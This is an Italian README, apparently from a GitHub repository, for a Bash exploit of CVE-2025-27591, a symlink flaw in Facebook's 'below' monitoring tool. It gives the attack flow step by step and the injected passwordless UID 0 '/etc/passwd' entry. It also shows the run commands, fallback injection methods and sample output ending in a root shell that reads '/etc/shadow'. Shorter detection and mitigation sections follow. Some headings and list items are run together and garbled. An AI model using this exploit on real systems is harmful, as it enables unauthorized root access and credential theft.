
Un exploit di escalation dei privilegi basato su Bash che prende di mira lo strumento di monitoraggio delle prestazioni di sistema `below`. Questo exploit rinnovato sfrutta una vulnerabilità di symlink nel meccanismo di logging per iniettare un utente root in `/etc/passwd`, ottenendo accesso completo come root.
Un exploit di escalation dei privilegi basato su Bash che mira allo strumento di monitoraggio delle prestazioni di sistema below. Questo exploit rinnovato sfrutta una vulnerabilità symlink nel meccanismo di logging per iniettare un utente root in /etc/passwd, ottenendo accesso root completo.
Scoperto e segnalato da Matthias Gerstner @ SUSE - Avviso di Sicurezza
/usr/bin/below (monitoraggio prestazioni sistema Facebook)/var/log/below/error_root.log → /etc/passwdLo strumento di monitoraggio below registra gli errori in /var/log/below/error_root.log quando eseguito con privilegi elevati. Se la directory di log è scrivibile da tutti, un attaccante può:
error_root.log a /etc/passwdbelow record per scrivere messaggi di errore nel symlinkQuesto exploit automatizza l'intero processo con meccanismi di fallback intelligenti per gestire varie configurazioni di sistema.
flowchart TD
A[Start Exploit] --> B[Get Username from User]
B --> C{Check /var/log/below<br/>World-Writable?}
C -->|No| D[Exit: Not Vulnerable]
C -->|Yes| E[Remove Existing error_root.log]
E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
F --> G{Symlink Created<br/>Successfully?}
G -->|No| D
G -->|Yes| H[Execute: sudo below record]
H --> I[Wait 3 seconds for logging]
I --> J[Kill below process]
J --> K{Payload in<br/>/etc/passwd?}
K -->|Yes| M[Success Path]
K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
L --> N{Manual Injection<br/>Success?}
N -->|No| O[Try Fallback:<br/>sudo tee -a]
N -->|Yes| M
O --> P{Fallback<br/>Success?}
P -->|No| D
P -->|Yes| M
M --> Q[Verify Payload in /etc/passwd]
Q --> R[Disable Cleanup Trap]
R --> S[Execute: su username]
S --> T[Root Shell Obtained]
style A fill:#e1f5ff
style T fill:#90EE90
style D fill:#ffcccb
style M fill:#98fb98Fase di Pre-Controllo
/var/log/below esistaFase di Configurazione
error_root.log esistente/var/log/below/error_root.log → /etc/passwdFase di Iniezione (Metodo Primario)
sudo below record in background/etc/passwd in modo utileFase di Iniezione (Metodi di Fallback)
echo >> symlink)sudo tee -a)Fase di Avvio della Shell
La voce iniettata in /etc/passwd segue questo formato:
username::0:0:username:/root:/bin/bash
Scomposizione dei Campi:
username: Nome utente fornito dall'utente (predefinito: "0xdtc")::: Campo password vuoto (nessuna password richiesta)0:0: UID=0, GID=0 (privilegi root)username: Campo GECOS (descrizione utente)/root: Home directory/bin/bash: Shell di loginbelow vulnerabile/var/log/below deve essere scrivibile da tuttisudo per eseguire below record# Rendi lo script eseguibile
chmod +x CVE-2025-27591
# Esegui l'exploit
./CVE-2025-27591
========================================
CVE-2025-27591 Exploit (Bash)
========================================
[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
CVE-2025-27591 Exploit (Bash)
========================================
[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc
[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable
[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter
root@kali:/tmp# whoami
root
Lo script include molteplici meccanismi di fallback per gestire varie configurazioni di sistema:
Gestione File Esistenti
Metodi di Iniezione Multipli
below recordsudo teeGestione dei Processi
below in stalloRilevamento di Esecuzioni Ripetute
/etc/passwd.
├── CVE-2025-27591 # Script principale dell'exploit
├── README.md # Questa documentazione
└── /tmp/exploit_payload # File payload temporaneo (creato in runtime)
Dopo lo sfruttamento riuscito, verificare l'accesso root:
# Controlla l'utente corrente
root@target:/tmp# whoami
root
# Controlla ID utente e gruppi
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
# Verifica l'utente in /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash
# Leggi file riservati a root
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]
Se è necessario rimuovere l'utente malintenzionato dopo il test:
# Rimuovere l'utente iniettato da /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd
# Rimuovere eventuali symlink rimasti
rm -f /var/log/below/error_root.log
Sostituire username con il nome utente effettivo utilizzato durante lo sfruttamento.
Monitoraggio dell'Integrità dei File
# Monitorare /etc/passwd per modifiche non autorizzate
aide --check
Rilevamento Symlink
# Controllare la presenza di symlink sospetti nelle directory di log
find /var/log -type l -ls
Log di Audit
# Controllare l'utilizzo sospetto di sudo
grep "below record" /var/log/auth.log
Correggere i Permessi delle Directory
# Rimuovere il permesso di scrittura mondiale dalla directory di log
sudo chmod 755 /var/log/below
Politiche AppArmor/SELinux
belowAggiornare Below
Monitorare /etc/passwd
Questo exploit è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati.
L'accesso non autorizzato ai sistemi informatici è illegale. Utilizzare questo strumento solo su sistemi per i quali si dispone di esplicita autorizzazione per eseguire test di sicurezza. Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.
Utilizzando questo exploit, riconosci di:
Repository: https://github.com/0xDTC/ Autore: Divine Clown (0xDTC) Licenza: Solo per uso educativo Ultimo aggiornamento: 2025-11-13
/etc/passwdsu <username> per ottenere una shell root